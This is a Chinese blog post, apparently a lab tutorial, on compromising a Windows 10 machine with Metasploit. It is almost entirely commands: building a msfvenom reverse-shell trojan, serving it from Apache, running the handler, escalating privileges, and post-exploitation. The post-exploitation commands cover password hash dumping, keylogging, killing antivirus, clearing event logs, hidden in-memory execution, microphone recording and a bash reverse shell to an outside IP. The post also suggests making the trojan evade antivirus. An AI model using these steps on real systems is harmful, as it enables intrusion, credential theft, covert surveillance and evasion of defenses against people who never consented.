msf win10系统攻击

已于 2022-10-03 19:04:35 修改
阅读量4.7k 收藏 57
点赞数 4
文章标签: java 服务器 开发语言
于 2022-10-02 21:01:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58199719/article/details/127146128
版权

前言:学习网络技术 本环境自己搭建
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

kali ip 192.168.141.129

windwos10 192.168.141.128

一、木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 -f exe > shell.exe   //保存到跟目录

 二、开启apach服务 service apache2 start

查看状态 ervice apache2 status

接下来把我们的木马文件 上传到apach里面

cp shell.exe /var/www/html

三、客户端访问下载打开 注:关闭杀毒 或者允许

 四、kali开启监听 msf

 (1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload  windows/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192.168.141.129(填写自己主机的IP地址)

(4)命令: set lport 3333(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit    //  -z -j(后台执行)

五、进入win10系统

注:木马可以做免杀 ,不然杀毒软件 会杀掉

六、提权

咱们权限只有管理员权限 需要提权

会话保持在后台  background 命令

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

use post/multi/recon/local_exploit_suggester

 接下来 利用这些搜索出来的 利用exp提权

常见的提权模块如下:

ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞
常用提权命令

sysinfo 查看系统命令
migrate 注入进程
getuid 获取当前用户
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限
可以先使用 getsystem 来自动提权,如果失败再手动提权

基础命令

ps 列出进程
sessions 查看会话
background 把session放置后台
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
interact id #切换进一个信道
back 返回主界面
shell 得到终端
search搜索模块
show 列模块
info 查看模块信息

    meterpreter > background  退出到msf命令提示符下

    meterpreter > lpwd  等价于在kali上输入pwd

    meterpreter > lcd /etc  等价于在kali上输入cd /etc

    meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

    meterpreter > run post/windows/capture/keylog_recorder  键盘记录

    meterpreter > run killav  结束目标主机上的杀毒软件相关进程

    meterpreter > clearev  清除系统日志

    meterpreter > download boot.ini  下载目标主机上的boot.ini文件

    meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传 
    nc.exe到目标主机上。(注意要使用2个反斜杠)

    meterpreter > dir windows\\system32\\nc.exe

    meterpreter > execute -f nc -nvlp 3333  执行nc.exe

    meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

    meterpreter > execute -f bash -i -H

    meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

    meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

    meterpreter > cat foo.txt 
    -m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查            
    杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

	meterpreter > getuid  查看当前用户

    meterpreter > getsystem  提权到system用户

    meterpreter > getprivs  查看当前用户具有的权限

    meterpreter > getpid  查看meterpreter注入到了什么进程中

    meterpreter > migrate 1436   更改到pid1436进程中

    meterpreter > getpid  重新使用getpid命令查看

    meterpreter > hashdump  获取目标主机上用户的hash值

    meterpreter > sysinfo  查看目标系统的信息

    meterpreter > kill 188  结束188进程

    meterpreter > shell  获取目标操作系统的shell

    meterpreter > idletime  查看目标主机已经空闲了多长时间

    meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

    meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

    meterpreter > load python  加载python插件

后面一些操作

msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)__Cyber的博客-CSDN博客_msf键盘记录

小晨_WEB
关注
  • 4
    点赞
  • 57
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击系统:虚拟机下kali linux靶机系统win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
利用kali对Windows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1866
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
利用msf入侵电脑
weixin_44761350的博客
05-25 1164
msf
cve-2020-0796_【CVE20200796】漏洞复现
weixin_39644139的博客
11-30 619
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端的漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
msfconsole攻击win10及简陋版
最新发布
极客云曦前端
05-29 284
该错误提示表明在Metasploit执行“shell”命令需要加载“stdapi”扩展。这可能是由于Metasploit架缺少所需的依赖库或文件。接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载,需要做免杀不然是保存不下来的。在win10 浏览器 输入192.168.1.19/muma.exe。输入 load stdapi 即可解决 需要在肉机 执行 生成的木马。kali 攻击机IP 192.168.1.19。再打开msfconsole。
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 622
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
通过msf渗透win10
qq_63651088的博客
03-22 1508
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4152
一次MSF模拟渗透测试攻击window实例
Kali MSF攻击Win10
nlj1860453的博客
01-05 1207
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
msf攻击Mysql服务.docx
04-26
在网络安全领域,Metasploit Framework(MSF)是一个广泛使用的开源工具,它提供了各种模块来探测、攻击和利用系统漏洞。针对MySQL服务器攻击是其的一种常见场景,因为MySQL作为全球最流行的开源数据库管理系统...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文包含了命令和步骤,很详细,给初学者作为参考。
linux系统安装msf的过程详解
09-14
在Linux系统安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1411
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
Kali渗透Windows服务器
yy1715713348的博客
07-31 962
本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。如下图:(2)输入以下命令,使用msfpayload生成名为setup的后门程序:如下图:(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3860
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及国国内多个高校校内网、大型企业内网和政府机构专网招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
操作系统攻击:早期WindowsMS10-046漏洞
shelter1234567的博客
07-29 1121
本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER ,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss攻击用户的系统 危险性极高。
msf永恒之蓝攻击win10
09-01
根据提供的引用内容,永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统最高权限的攻击方式。然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统攻击。永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。 如果你想在Metasploit Framework使用永恒之蓝攻击模块对Windows 10进行攻击,你需要使用另外一个模块,如`ms17_010_psexec`或`ms17_010_eternalromance`等。这些模块允许利用永恒之蓝漏洞攻击Windows 10系统。 请注意,进行任何形式的攻击都是非法的,除非你有合法的授权并且在合法和合规的环境进行。我强烈建议遵守法律和道德准则,避免从事非法活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [经典利用永恒之蓝漏洞对Windows操作系统进行攻击](https://blog.csdn.net/qq_46202048/article/details/121535176)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值